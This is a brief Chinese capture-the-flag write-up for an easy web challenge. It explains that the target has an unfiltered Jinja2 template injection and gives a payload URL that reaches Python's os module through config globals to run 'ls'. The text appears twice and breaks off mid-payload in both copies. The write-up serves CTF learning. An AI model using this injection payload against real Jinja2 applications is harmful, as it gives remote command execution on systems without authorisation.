擂臺Web1:Easy Injection
題目難度:簡單
考察:python模板注入(jinja2模板注入)
典型的模板注入,無任何過濾,直接構造利用payload:
http://101.201.126.95:7050/{{ config.__class__.__init__.__globals__['os'].popen('ls'
題目難度:簡單
考察:python模板注入(jinja2模板注入)
典型的模板注入,無任何過濾,直接構造利用payload:
http://101.201.126.95:7050/{{ config.__class__.__init__.__globals__['os'].popen('ls'